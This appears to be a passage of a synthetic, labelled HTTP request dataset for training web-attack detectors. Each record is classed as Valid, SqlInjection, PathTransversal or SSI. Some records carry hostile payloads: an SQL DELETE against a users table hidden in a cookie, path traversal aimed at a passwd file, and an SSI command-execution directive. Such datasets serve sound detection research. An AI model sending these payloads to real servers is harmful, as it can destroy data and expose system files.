Transfer-Encoding: identity
Upgrade: ioe/1.7, mcilol/7.0
Warning: 420 www.actoit.htm "nyml7olireede" "Tue, 02 Nov 04 22:52:56 UTC"
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 680648582
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19146
Start - Id: 10243
class: Valid
GET /ibDBiYC@ha.@UMuhss6/s8tswhdzcasfraPrsoec/u4nt/hs7xzH3ZO-PIj/uKX5EMLN2c/tsa2/0_slPwWBj/Aesestn/bifia4/ffjV.G..shtml?dnnynhkorp=6&Cuo44rd=rag9o&ooa6r0taeoa2i=mnh&bo=+n HTTP/1.1
Host: www.dskaSefao.it
Connection: close
Accept: text/plain;q=0.6, application/*, video/*
Accept-Charset: *
Accept-Encoding: identity;q=0.9, identity, deflate, compress
Accept-Language: *;q=0.3
Cache-Control: max-stale=7
Client-ip: 104.102.74.180
Cookie: rr5jaztr=nnnetcatutMdoI;tn=saijgj
Cookie2: $Version="771"
Date: Sat, 22 Oct 05 01:33:34 UTC
ETag: "yT-EIHi7W-TfRqVrOJ2"
Expect: 100-continue
From: guJn@i6rimsl.ch
If-Modified-Since: Fri, 24 Oct 08 12:42:08 UTC
If-Unmodified-Since: Mon, 30 Jul 07 23:55:41 GMT
If-Match: *
If-None-Match: "nQ0zqvkYYr0d9U5"
If-Range: *
Max-Forwards: 7
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest response="09D35458eFFCF6eeB6ECbdFBEAdD11C5"
Authorization: iofsS ndhMl=s0eeaeg
Range: 48806-,859-40,-983
Referer: /5euol/aepso/goei.tar.gz
TE: chunked,gzip,deflate
Trailer: Via
User-Agent: Mozilla/5.7 (X11; U; SunOS sun4u 4.8; ho-as; rv:9.4.1) Gecko/69428387
UA-CPU: PowerPC
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 090x474
Via: HTTP/4.1 www.hwehnt.shtml:051, HTTP/6.5 www.tonuTdn0.gif, 3.1 109.218.162.124
Transfer-Encoding: o8bb
Upgrade: e34/2.8, srytrj/3.4, igIE5/7.9, eidtoe/3.9, xiv8g/0.2
Warning: 137 www.aoert7d.jpg "raxgmxezaeEwLeicric1" 
X-Forwarded-For: 49.165.67.177
X-Serial-Number: 56021671448691274221
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10243
Start - Id: 34583
class: Valid
POST /4A/Lehu9Niginhhkthnltt/POExmofDh/myaeisnt/tlndelTleAnyplRfpa/wA-MFBuwxmlv/eecohNpS1/boot.iniaepW/6tfnslsoias/rhY1hasaiwyfmnAcl/rpLgpW36BaLie.php4? HTTP/1.0
Content-Length: 224
Content-Language: ea,XR
Content-Encoding: gzip
Content-Location: http://eenhpAs.fr/92eseemg/uptnpk/untacaec/fsit/lrtrth.tar.gz
Content-MD5: MGVwc3RhaWFlZW9zaGtobA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 02 Apr 05 09:09:28 CET
Last-Modified: Tue, 23 Jun 09 05:20:47 GMT
Host: 40.108.192.95
Connection: keep-alive
Accept: image/png, audio/basic;q=0.3, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rcvKgwn9-pEo1men;q=0.6, sbnori-i;q=0.9, sHubnqft-f;q=0.8, hele6z-kl9g;q=0.2
Cache-Control: no-cache
Client-ip: 161.213.155.170
Cookie: rcs=e51i oes i98l e;uoOts0ln=r0Lh9ulltmh4r1;8xhi=02;esrsBNgiSeT=tltetWFooa )o
Cookie2: $Version="5"
Date: Fri, 05 Oct 07 17:13:06 UTC
ETag: W/"KPKlUFLo-_mo_Mefai"
Expect: 100-continue
From: Oaodnbea@frlfa.ch
If-Modified-Since: Fri, 24 Nov 06 15:42:28 UTC
If-Unmodified-Since: Sun, 13 Feb 05 05:32:26 CET
If-Match: *
If-None-Match: "2aMhbbHGuQbr.gXqb3t"
If-Range: "mw.NWwoxlcuip_hSkzPI"
Max-Forwards: 7519
MIME-Version: 1.5
Pragma: 7ys='tw0'
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: Digest opaque="aerr"
Range: 1867-,-2727
Referer: http://www.etiee.com/heocn/rhsmNnso/drs9pcl.mdb
TE: gzip
Trailer: Date
User-Agent: Mozilla/1.0 (compatible; rhehitcTG; Open BSD i386; oslTvvsllL)
UA-CPU: PowerPC
UA-Disp: 518,1124,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 512x9817
Via: FTP/9.3 170.255.177.186, FTP/1.7 0.82.62.190, FTP/0.1 www.2eOtoh.htm
Transfer-Encoding: anen
Upgrade: Qodwe/1.4, 5thx7/5.2, EeTnts/6.6
Warning: 167 www.rhqsT.css "8mTr" 
X-Forwarded-For: 7.90.1.179
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dy34twim21Awrra=2393&iframe8dHlxx4mSechoj=8&ertdhecbhOnet=663&orteganr2ebs=2oo:onodeNnoC9tt&halo=s:cmdaDA7etpc&from.pQQs=0@8QeCKjQevF&nRi9sfmuqrn=75856&wmrtFPuy5qau=allcmde iisic[slnekrstre&yrY6to1iet=oaaY&rrhIae=nAU

End - Id: 34583
Start - Id: 12833
class: Valid
GET /etcaG_JUtZy8Rly/yepHz/wP/ryp-V/Keate8reloCr3tc9ihmn/ydjO/H2EIXflshkbeB/its.P1b3Tdx.mdb?k5gesadrretOr=022369 HTTP/1.0
Host: 248.2.238.253:308
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-1;q=0.2, x-mac-chinesetrad, cp-950
Accept-Encoding: compress
Accept-Language: TTdzei8d-rddnqr9, Te-wnt;q=0.6, isc-arl;q=0.8, 9teTnsg-t
Cache-Control: m='ugireHgt'
Client-ip: 100.64.54.199
Cookie: n7m1erreohbugk=80LhiDp@b7hk;sdcm=02094
Cookie2: $Version="875"
Date: Sun, 19 Mar 06 17:26:14 UTC
ETag: "bgPzNMyNJ@_19U_S"
Expect: 100-continue
From: imdtau@eat0rosebo.ch
If-Modified-Since: Sun, 30 Jul 06 20:10:20 GMT
If-Unmodified-Since: Sun, 05 Dec 04 06:21:53 CET
If-Match: "zoq2aYRbprV54VIdFso"
If-None-Match: "earKhfogxg1Thnh-l"
If-Range: *
Max-Forwards: 1
MIME-Version: 1.4
Pragma: raoxIela=mvt2
Proxy-Authorization: Basic YmZlTzI6NmVlbWJsaWk=
Authorization: Basic YXRpZzptb2Jhc3Q0
Range: -27,-00780
Referer: http://dWrs.de/iitr/raiidsaf.msf
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/0.3 (X11; U; Solaris 3.8; ei-ge; rv:2.5.2) Gecko/20111242
UA-CPU: Sparc
UA-Disp: 3127,7217,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0320x5347
Via: osea/7.7 www.hOotkdot.tiff, HTTP/4.0 166.42.156.95:225, FTP/0.1 www.7dimmi3.html
Transfer-Encoding: identity
Upgrade: nhevnn/5.6, qd3g/2.0
Warning: 443 11.128.35.247 "eilrust" 
X-Forwarded-For: 126.193.58.111
X-Serial-Number: 267270605384116
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12833
Start - Id: 41303
class: SqlInjection
GET /lhv6yDcDim.php4?kiteonEseI=%5Cstwawt%2Fea%3Flnhrm%3Aobi6&eaCneyso=+%40yrcsdOn6&ZWX5Z=5dd5dazPhw&nao=70661&vaoseaabnzD=7187511&htseaualp=dRtgnreufa HTTP/1.0
Host: 164.42.235.75
Connection: N5dc
Accept: */*
Accept-Charset: cp-936;q=0.3, iso-8859-4, x-mac-roman;q=0.9, koi8;q=0.5
Accept-Encoding: identity;q=0.7, deflate, compress;q=0.6, identity;q=0.6
Accept-Language: rp4ans-edeji, tnOtr3-rA, 8-sonol;q=0.1, so-dkevtsrr, inenSa-srtah;q=0.2
Cache-Control: only-if-cached
Client-ip: 163.36.54.41
Cookie: nphiNzhus0=6pe'  );     DELETE  FROM     users     WHERE  upper(username)    =    upper('admin
Cookie2: $Version="6"
Date: Sat, 04 Apr 09 04:20:16 CET
ETag: W/"I1QaKCxklWDlSXVw"
Expect: 100-continue
From: syaw2n@lrei.com
If-Modified-Since: Mon, 21 Apr 08 05:03:34 UTC
If-Unmodified-Since: Sun, 25 Jul 04 20:06:41 UTC
If-Match: "H.ggEHmvkC1trh76h"
If-None-Match: "okUQTbEI33Ovo7nEhW"
If-Range: "RySZRmirXG1uSz.O"
Max-Forwards: 1416
MIME-Version: 1.8
Pragma: ersaeq=w
Proxy-Authorization: Basic NGFyb2liNG46ZGF5b2Q4dw==
Authorization: pta0 axwi=rneetc
Range: 536989-,435785-66,662-
Referer: /er9m/n2RcsfyH.txt
TE: gzip;q=0.3
Trailer: From
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 4.3; ad-rv; rv:3.1.5) Gecko/97651472
UA-CPU: 68000
UA-Disp: 8902,8291,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 470x0638
Via: 9.5 www.odo7n.html, 1.4 86.147.73.114
Transfer-Encoding: compress
Upgrade: socrc/1.5, hIo/9.2
Warning: 387 186.147.86.32 "h3ea5eriueh" 
X-Forwarded-For: 47.84.163.47
X-Serial-Number: 670048221
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41303
Start - Id: 7187
class: Valid
PUT /epvqLw/m0wEWolajbK4@qQ.P/tTeane/injI.AupJZuk/EsuhnohhtrahziyUhS/ctmsit1et.aspx? HTTP/1.1
Content-Length: 28
Content-Language: zor
Content-Encoding: compress
Content-Location: http://gEhine.cz/ibheaZs.js
Content-MD5: MTltdDlheGVyZHNhbzBhag==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Aug 04 01:43:03 CET
Last-Modified: Fri, 17 Nov 06 10:33:45 GMT
Host: www.rpFhfommNf.gov:4973
Connection: pEmp6t
Accept: application/*, video/*
Accept-Charset: iso-8859-2
Accept-Encoding: *
Accept-Language: ng-Lroboi;q=0.2, t-7
Cache-Control: no-transform
Client-ip: 3.86.121.179
Cookie: Li0iIldesir=y;v2dsudagtiKt=between%re(~foy a;nyWi=9802737
Cookie2: $Version="2"
Date: Sun, 04 May 08 03:23:13 GMT
ETag: W/"Sh3yDPz9_yECZK34u"
Expect: 100-continue
From: rnaa5sa6@a60sretsto.org
If-Modified-Since: Fri, 03 Oct 08 02:10:51 GMT
If-Unmodified-Since: Tue, 02 Oct 07 11:08:35 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 21 May 05 09:35:25 UTC
Max-Forwards: 332
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest nc=9f15Ac7e
Authorization: agxu8q rnia=eiefhE0u
Range: 975551-,9376-71358
Referer: http://nEohihr.ch/n9ect/Ontfi/o7ooh/rdfnzid.swf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.1 (compatible; MSIE 8.0; Open BSD i386; oeb0Tahaq)
UA-CPU: MIPS
UA-Disp: 337,1594,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7035x878
Via: HTTP/8.5 www.r4eel.tiff, 4.7 www.taoAlpra.png, t4o/0.5 3.183.80.154
Transfer-Encoding: gzip
Upgrade: aqreph/7.4, yeImai/7.7
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 113.209.161.140
X-Serial-Number: 5378010868649700329
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ylttfren5l=b7eescriptnsib dM

End - Id: 7187
Start - Id: 46342
class: PathTransversal
GET /dOiKb.msf?idiiqRmfXib=%2F%2C%2C%2C%2FyorE%2Fcnso%2Fpasswd HTTP/1.1
Host: www.e69tmh.it
Connection: keep-alive
Accept: audio/x-wav, image/*
Accept-Charset: iso-8859-8, koi8;q=0.1, windows-1255;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.9
Date: Mon, 02 Jun 08 13:00:35 CET
If-Modified-Since: Wed, 24 Sep 08 10:42:33 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 8
Authorization: Basic bHMyMzpVbDFzYWU=
Referer: http://www.ddoGe.ch/bAstuats/LihdncC/Hrit/asehnc.exe
Trailer: Proxy-Authorization
User-Agent: 5di6hracEl (ziSXbwVH)
UA-Pixels: 648x2225

null

End - Id: 46342
Start - Id: 33322
class: Valid
PUT /NofkWU/Be1Avs.jpeg? HTTP/1.0
Content-Length: 18
Content-Language: rzht
Content-Encoding: identity
Content-Location: http://www.iedRtg9.de/cwci/td5Haeda/5twEanS/ehrl.gif
Content-MD5: MnRPcHhkY2lhZWFOZXR0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Apr 10 03:19:11 UTC
Last-Modified: Fri, 25 Jul 08 20:13:42 GMT
Host: www.ipe7n.fr:80
Connection: keep-alive
Accept: video/mpeg;q=0.2, image/png, audio/x-wav
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.5, compress;q=0.5, deflate, deflate
Accept-Language: gfi-ewrao;q=0.1, wii-2iev, G0c-on3iunEt;q=0.8, sfolr-l1r;q=0.4, avo3ist-ladep
Cache-Control: only-if-cached
Client-ip: 238.149.52.146
Cookie: raenoa=rnee;easD=36063961;sd=yeeHtr
Cookie2: $Version="03"
Date: Mon, 30 Mar 09 13:54:01 UTC
ETag: W/"aYE2lX5JEkSIDDOqg1n"
Expect: hTuga
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Sat, 08 May 04 16:37:16 UTC
If-Unmodified-Since: Sun, 27 Jan 08 01:50:05 GMT
If-Match: "nMIXg@FZIvjktYpTNuk"
If-None-Match: *
If-Range: Sat, 13 May 06 14:26:45 CET
Max-Forwards: 77
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest response="82Aefeab6F6E793D521a04Cc9Ec2D0A4"
Authorization: Digest nonce
Range: 6-,39-,43-
Referer: http://www.irem.uk/drhbpye.conf
TE: deflate
Trailer: User-Agent
User-Agent: 7l5lkOy http://www.iops.biz
UA-CPU: StrongARM
UA-Disp: 6610,281,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1181x772
Via: 6.7 www.edresc.jpg:561, 0.8 www.weAp.htm, FTP/1.0 190.222.77.247
Transfer-Encoding: compress
Upgrade: erraNN/6.8, erpl/9.7
Warning: 225 8.156.160.60 "gIs0jtndnqerEqatp" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 5827014
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nhdO=3Cn9haIonomBa

End - Id: 33322
Start - Id: 39943
class: SSI
PUT /lrswEa1rLouhatdtvmht/tnSfsi1edeoirri/uKBLP9vuvx/Nysot/e_vRZT1jLEc5Lei/kGt/rtsfeaUi.mdb? HTTP/1.1
Content-Length: 76
Content-Language: 2,2dptlE,rlotnper
Content-Encoding: gzip
Content-Location: http://www.anio5eE.com/Dapar8cu/Odio8y/eftP.zip
Content-MD5: MGUwYWVlQW5kcmFoZWFvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Sep 09 12:45:07 UTC
Last-Modified: Fri, 04 Nov 05 03:07:56 CET
Host: 150.24.190.14:80
Connection: close
Accept: text/plain, text/*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.5, compress;q=0.9, deflate;q=0.0, identity, compress
Accept-Language: *;q=0.5
Cache-Control: zbelch=Qckoo
Client-ip: 195.128.80.161
Cookie: ohachsxiss=eEnqlqnplaaesntgt8;etoms=34;a4raFens=nrimt;mnctecjaont=195061
Cookie2: $Version="33"
Date: Sat, 22 Oct 05 12:41:55 GMT
Expect: acstne=Sh1yt
If-Modified-Since: Fri, 13 Nov 09 19:41:25 UTC
If-Unmodified-Since: Tue, 08 Aug 06 04:06:02 CET
If-Match: *
If-None-Match: "jbFnPUIQs@Tr7oW"
If-Range: Tue, 21 Dec 04 04:54:50 UTC
Max-Forwards: 8743
MIME-Version: 0.5
Pragma: ijwW=O
Proxy-Authorization: NTLM MnQ0N3d2bnRjbTF3dGQzdEFha2l0bjlybHhocGxhaGVlbnRsbjhhclI=
Authorization: Digest opaque="drBm"
Range: 1-586
Referer: http://ogeha.st/oriiRr/ras69dmt.shtml
TE: trailers
Trailer: From
User-Agent: enanlziertest5aiptt
UA-Pixels: 3924x987
Via: 6.1 www.Feteod9.css:77, 9.9 121.251.10.92, Tnia6l/4.5 www.riaov.shtml
Transfer-Encoding: deflate
Upgrade: AWutq/3.3, Ereghm/5.5, aashd/6.2, ypndU4/8.9, Egoa/7.9
X-Serial-Number: 029145604

tjtqnee=<! #<!--#exec   cmd="id"-->&3gzaaotgis5i4=510606

End - Id: 39943
Start - Id: 21982
class: Valid
GET /eau6Qu5d0Od5GncZ@Od/fZ/hs/g@eL0@ZcE0elZQK/hSbvuMpf/0mQnetcl0dk-aDWT/@FXfn5Iv/mRTab7DVigU5s@CL8/TS2pSa/hKQMVe3DK0kHFqk11H/aUvZO2UqhX-7.asp?r8rax=e5eeN99Sare&rw=ak-LGMqB&hazeadtCNEYj=q8wen5nnonmtatlaru&uwZsta=0870358&sm=%3Ddso&saUaytb=tl4mnhiewg&notos035oooti=eQJ5&e1=aerizgaslahnw&olwloraeet3qvae=ltGdZFNY&dhw9oqaaolTsi=s%26ec&12gbeoolshysTdl=oifrom%3Eynce&mtrsETnTSooa=36&isuv1rEklsa8li=%29%3FuetrItshutdowniwaexia&unehwiia4=32&4nz=29104 HTTP/1.1
Host: 104.11.231.213
Connection: ketytem
Accept: text/*;q=0.6, text/*;q=0.4, audio/*
Accept-Charset: iso-8859-8-i;q=0.0, iso-8859-6;q=0.9
Accept-Encoding: *
Accept-Language: sehbn-s, iNt0rE-gIt;q=0.4
Cache-Control: no-cache
Client-ip: 114.150.253.168
Cookie: w.C8XF7cZNN=e;Yaei=eOincludeoeet6moj5
Cookie2: $Version="698"
Date: Mon, 18 Jun 07 15:05:26 UTC
ETag: W/"w8_ObORHhZaf2C@l8y3"
Expect: s9aD
From: 6i9vB@tf7iiehihE.ch
If-Modified-Since: Thu, 27 Oct 05 22:33:23 GMT
If-Unmodified-Since: Fri, 13 Nov 09 15:20:06 GMT
If-Match: *
If-None-Match: "LK0gvAbcOSw4mIDzT@lc"
If-Range: Mon, 06 Oct 08 01:07:44 CET
Max-Forwards: 11
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: Digest qop=auth
Range: 2-874,8-,3113-623962
Referer: http://tRhd.org/Rtdnc0e7/hs5qak.swf
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/6.5 (compatible; 2yaat; Win98; eiwt; ensm3; oedimznN)
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0095x515
Via: Scshoa/5.3 245.49.201.89
Transfer-Encoding: deflate
Upgrade: fysst/0.3
Warning: 225 83.153.240.145 "z2mns9" "Wed, 03 Nov 04 24:19:07 UTC"
X-Forwarded-For: 3.21.36.129
X-Serial-Number: 920022590702
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21982
Start - Id: 44829
class: PathTransversal
GET /eGwpasswdwzxB/vdw/ittTeaecnzeau/7xerTtenAoae1rAsar.shtml?fWr1=urAR%28d%3A+lCi1usrm&c1tIhn8ahhssnd=rioqEtesi&nLTuirsne5=uuJ%7Ed&aenayTdrrg=hi%3D%2B&nsOo2Aiufa69i=648408196&8eW_7kaLoXallC=..%2F..%2F..%2Fge%2Fadmin.txt&30aH=log0bE4bodyhz2co+H%29c&snAe=1550&selcptTto4r=afiegroup+bytmpmetaEstylewindow.open3gs HTTP/1.1
Host: www.ar5lhA9G.org
Connection: keep-alive
Accept: text/*, application/*;q=0.5, text/html;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.8, compress;q=0.4
Accept-Language: *
Cache-Control: b1tnu=ewtr
Client-ip: 92.163.213.217
Cookie: oiero1c84ea=neiG
Cookie2: $Version="00"
Date: Wed, 04 Oct 06 22:44:18 CET
ETag: W/"LAeUV2MDP1zNaGt61NV-"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 026
MIME-Version: 9.8
Pragma: e=t2otyk
Proxy-Authorization: dsect8 atir0rto=aaeeis
Authorization: eH4teM jsxnoc=5ihxiqi
Range: 49-580233,702708-4982,-8
Referer: /e4okqsao/ghef/cheEi2c.wav
TE: gzip,chunked;q=0.1
Trailer: From
User-Agent: taFQvMyzig http://www.l5tRn.de
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/5.3 241.190.43.239:8475, 1.1 109.50.57.136, 5.1 www.fwagr.jpg
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 479 www.eao96f.png "ldeigihLwAo78oeint" "Mon, 21 Dec 09 20:16:29 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44829
Start - Id: 5278
class: Valid
POST /slFWV2ISFW-5_taHS/7DciAk@/Odd4lsim8R/hAdQwlaOPR47PIw/j9/0.@Bu.htm? HTTP/1.0
Content-Length: 209
Content-Language: ee,ies,u3trg
Content-Encoding: compress
Content-Location: /r7ngsiI/tdobade/ttaamNn/asne/Acmrd.php4
Content-MD5: ck5kY2haaWVwc3JlbjNsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Jun 06 14:14:41 CET
Last-Modified: Sat, 03 Jun 06 03:13:41 UTC
Host: 79.30.121.197
Connection: keep-alive
Accept: audio/x-wav;q=0.1, application/*;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.8, gzip;q=0.2, identity, gzip, compress;q=0.3
Accept-Language: srpndk5-imsntEq, irT7e5b-t, 3atdcbs-lrUer;q=0.9
Cache-Control: only-if-cached
Client-ip: 125.203.178.102
Cookie: eoroVIaciteaa=atonhEts Enph-u\a;9FCqhtacces=ttoope)4l ;ui=85844
Cookie2: $Version="82"
Date: Sun, 01 Apr 07 07:40:33 GMT
ETag: "DZkFISR-usrtXQLqOJ"
Expect: 100-continue
From: rpfz@tmadFbssh.cz
If-Modified-Since: Sun, 25 Dec 05 04:18:38 GMT
If-Unmodified-Since: Fri, 02 May 08 02:25:40 UTC
If-Match: *
If-None-Match: "WNEVAePnZWrSUMF"
If-Range: "KBtne86H-1Jpu-Hb"
Max-Forwards: 8081
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: sabs4 b0u0a=teeanu
Authorization: Digest opaque="5eIoie"
Range: 44-,39-,850121-
Referer: /ri5r/ltlnm.bin
TE: chunked
Trailer: If-Range
User-Agent: Mozilla/9.1 (compatible; Konqueror/4.9; Unix; Iuhnus; topa)
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4414x768
Via: ldexif/8.6 www.0Ndm.js
Transfer-Encoding: deflate
Upgrade: vnWhh/6.9, 0cx/5.3
Warning: 731 183.237.250.141:0 "tuteLitohsstoT" 
X-Forwarded-For: 178.75.102.4
X-Serial-Number: 76349451666157165
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

surmEr68sltr=cttt9suu&WSIUuhD=kgaoi&ops3ssl=37466&e8eu3al=09713&Im6tnnitdr=N-Leh7dy'E1/a &8toahib=301&569xprocessing-instruction7etcTInU_=dSscript tdO&mtnmmryaicv=5420&ottcl6wai=s>SdalGinhx&rwrfxl=er;e

End - Id: 5278
Start - Id: 17352
class: Valid
GET /wGXk_VrjZiY/RB.png? HTTP/1.0
Host: www.aadsint.uk:80
Connection: uhdebe
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 33.255.255.186
Cookie: r2utfaaaDpetsIf=65199356;vj4nUedwiei1D=35666;GhenwhNlwh3soqj=m;ie99eoefW1=vuomFIy
Cookie2: $Version="64"
Date: Sat, 09 May 09 16:05:21 UTC
ETag: "OntaRxc2nvK3PjYB"
Expect: 100-continue
From: atnl@pt6tqur.gov
If-Modified-Since: Tue, 29 Aug 06 19:46:43 CET
If-Unmodified-Since: Fri, 17 Oct 08 06:36:37 CET
If-Match: *
If-None-Match: "zLSTWaJeHzhNQ0YX"
If-Range: Fri, 28 Jul 06 22:20:41 GMT
Max-Forwards: 865
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM b3RlaG5uc2hrZXljY21ub3JvMGVlaGRodG9nNzRtbWloaWg=
Range: -86
Referer: http://www.sntat.gov/hmetoa/aopatbos/ol7f/d7veCg/tanrulp.cgi
TE: gzip,deflate;q=0.4,trailers
Trailer: Range
User-Agent: Mozilla/4.1 (X11; U; Unix 5.6; be-rr; rv:2.0.2) Gecko/44000345
UA-CPU: x86
UA-Disp: 469,0060,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 717x8576
Via: 0.5 28.210.172.169
Transfer-Encoding: deflate
Upgrade: hulh/0.2, aau/8.4, stan/1.1
Warning: 958 91.173.38.76 "jetsanndA" "Wed, 17 Jun 09 11:49:56 GMT"
X-Forwarded-For: 81.255.22.153
X-Serial-Number: 69600
----: -----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 17352
Start - Id: 26926
class: Valid
GET /LDs5VqlogTGaTJvK/tscrieel3Uhc/eXZqigwzqkmRnFlRGId/%u1YB5-35I/sY.lpMEmsMDu_ODVXdc/msksHFiliWn.bin? HTTP/1.1
Host: www.rsifero.st
Connection: 5lnLS
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.2, gzip;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 126.121.72.212
Cookie: pieliep6=98036122;4hue2lerieweet=eS-;likeBDyhArIrY=7loRaraeahW
Cookie2: $Version="3"
Date: Sat, 30 Aug 08 20:15:47 CET
ETag: W/"9wDIxkc9rZu_E@g2"
Expect: 100-continue
From: hivetoa@epAldB8o.biz
If-Modified-Since: Sun, 17 Jan 10 10:19:19 GMT
If-Unmodified-Since: Sat, 07 Feb 09 10:45:29 CET
If-Match: "@chbChm6osl3WLCHx13"
If-None-Match: *
If-Range: "Xryj7FkMhRr78jwaM"
Max-Forwards: 3172
MIME-Version: 3.8
Pragma: cqr=dnc6
Proxy-Authorization: Basic aHB1amJzcHY6bFdhaXQ4dA==
Authorization: NTLM YmlzbGh5MDFwZHJvdXUySWhyczNpaXJmbWVpdDF0VW9sZTM5MmNFYVQ2aE8=
Range: 909287-,-7
Referer: http://pnnwnasr.biz/hhiai.gif
TE: trailers
Trailer: If-Match
User-Agent: sije6ro
UA-CPU: Sparc
UA-Disp: 5159,4432,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7851x9196
Via: 1.1 www.ljjdig.jpeg, 9.4 14.218.6.162, 8.8 222.253.254.73
Transfer-Encoding: identity
Upgrade: nag0E/3.8
Warning: 818 www.epeni.shtml "ttaTrueeopAqad9dns" "Sun, 12 Apr 09 10:10:01 CET"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 26926
Start - Id: 27447
class: Valid
GET /ilrmor2acOdesherr2i/lmzLIbFesu/oXQRI9juyABx.pbW9P/hrPJ.bEuY@ZF4/sH4AZvHWNq9/uGgETBtdSuPzm/hg3v.ZE7RJ/tg4dUSg1Nh_0vjc/sml4mnarySojriin9/uT5Epku8/hK4M8ZsT2n/qOpj0atH4ga1bhjblo.mspx? HTTP/1.0
Host: 85.94.229.99:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: ptisns-hamh, cn-i
Cache-Control: max-age=78
Client-ip: 213.169.24.78
Cookie: rmnv4WpaEmrie=1ao;sdrteeomi8t2u=214177073;ih2lcljltore=12537991;o8=366;AIs9zecmrtAeel=rbjwmr/ sock_streame 'thtn ge
Cookie2: $Version="3"
Date: Fri, 08 Oct 04 18:21:25 CET
ETag: W/"H.wPWoYeJYgMrTAy3"
Expect: coouoR
From: nt7minop@lhace.uk
If-Modified-Since: Wed, 08 Jun 05 11:06:39 UTC
If-Unmodified-Since: Sat, 02 Feb 08 11:43:24 GMT
If-Match: *
If-None-Match: *
If-Range: "3J6xqMq2UFoyUPTREGt"
Max-Forwards: 188
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic NmVvclY6c3l0NA==
Authorization: Digest username="am7A"
Range: 86-
Referer: http://hoEEathu.st/eqoHulp.avi
TE: gzip,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/6.1 (Machintosh; U; PPC 1.3; ae-t4; rv:7.2.1) Gecko/91843512
